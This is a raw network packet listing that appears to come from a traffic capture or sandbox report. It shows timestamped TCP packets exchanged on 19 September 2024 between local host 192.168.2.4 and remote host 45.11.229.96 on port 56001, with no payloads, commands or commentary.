                                Sep 19, 2024 02:25:52.453665972 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.453668118 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453696966 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453713894 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453716993 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.453732967 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453752041 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453759909 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.453798056 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.454478979 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.454495907 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.454514980 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.454541922 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.454606056 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.454624891 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.454643011 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.454653025 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.454694986 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.455410957 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.455436945 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.455456018 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.455472946 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.455486059 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.455492020 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.455512047 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.455516100 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.455565929 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.536318064 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.536338091 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.536355972 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.536389112 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.539920092 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.539967060 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.540003061 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540019989 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540038109 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540061951 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.540067911 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540086985 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540106058 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540107965 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.540148973 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.540513039 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540539980 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540600061 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.540700912 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540718079 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540735960 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540752888 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.540754080 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540774107 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.540791988 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.541198015 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541214943 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541235924 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.541240931 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541259050 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541275978 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.541276932 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541295052 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541313887 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541326046 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.541332960 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.541353941 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.542133093 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542150021 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542170048 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542175055 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.542187929 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542207956 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.542216063 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542234898 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542252064 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542254925 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.542270899 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.542288065 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.542954922 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.543011904 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625494003 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625530005 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625557899 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625577927 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625586033 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625602961 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625622988 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625641108 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625659943 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625664949 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625664949 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625677109 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625695944 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625694990 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625714064 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625746012 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625886917 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625905991 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625924110 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625932932 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625942945 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.625960112 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.625983000 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626032114 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.626108885 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626138926 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626157045 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626178026 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626194954 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626198053 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.626230955 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.626605988 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626648903 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626653910 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.626667976 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626703024 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626710892 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.626720905 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626768112 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.626792908 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626840115 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626857996 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.626899958 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627023935 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627023935 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627036095 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627088070 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627105951 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627132893 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627135992 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627151012 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627173901 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627475977 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627495050 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627512932 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627522945 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627531052 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627551079 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627717972 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627737045 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627763987 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627767086 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627782106 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627800941 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627818108 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627835035 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627839088 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627839088 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.627855062 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.627886057 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.628161907 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628180027 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628196955 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628211975 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.628215075 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628233910 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.628634930 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628663063 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628679991 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628679991 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.628700018 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628717899 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628717899 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.628736019 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628757000 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628758907 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.628772974 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.628803968 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.670099020 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.710202932 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.710222960 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.710242033 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.710311890 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.710328102 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.710346937 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.710365057 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.710371971 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.710397005 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712243080 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712270021 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712289095 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712305069 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712318897 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712323904 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712342024 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712348938 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712361097 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712389946 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712404966 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712416887 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712434053 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712435007 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712465048 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712481976 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712482929 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712500095 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712517977 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712521076 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712537050 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712554932 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712568045 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712577105 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712594032 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712595940 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712615013 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712631941 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712635994 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712672949 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.712937117 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712954998 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712985039 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.712996960 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713004112 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713022947 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713041067 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713047981 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713058949 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713083982 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713088036 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713108063 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713124990 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713133097 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713143110 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713160992 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713165998 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713179111 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713196039 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713203907 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713215113 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713232994 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713233948 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713274956 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713579893 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713597059 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713614941 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713639021 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713737011 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713754892 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713773966 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713785887 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713792086 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713814974 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713881016 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713900089 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713917017 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713929892 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.713936090 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.713956118 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.714037895 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.714056969 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.714075089 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.714085102 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.714095116 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.714112997 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.714118958 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.714160919 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715138912 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715154886 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715172052 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715205908 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715228081 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715245962 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715262890 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715274096 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715281963 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715308905 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715308905 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715327024 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715346098 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715353012 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715364933 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715394020 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715400934 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715418100 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715435982 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715924025 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715944052 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715961933 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715975046 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.715980053 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.715998888 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716013908 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716017008 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716034889 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716038942 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716058016 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716087103 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716169119 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716196060 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716212988 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716217041 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716231108 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716248035 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716259003 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716268063 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716284037 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716286898 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716306925 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716324091 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716331005 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.716346025 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.716372967 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.763854980 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.810554981 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810580969 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810600042 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810619116 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810640097 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810648918 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.810704947 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.810794115 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810837030 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810841084 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.810856104 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810895920 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.810936928 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810955048 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810973883 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.810997009 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811064005 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811081886 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811100006 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811111927 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811120033 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811158895 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811208010 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811227083 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811244965 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811253071 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811261892 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811288118 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811290026 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811310053 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811327934 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811330080 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811357021 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811362982 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811376095 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811403036 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811414957 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811423063 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811441898 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811461926 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811465979 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811490059 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811506033 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.811518908 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811537981 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811556101 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.811561108 CEST4973856001192.168.2.445.11.229.96
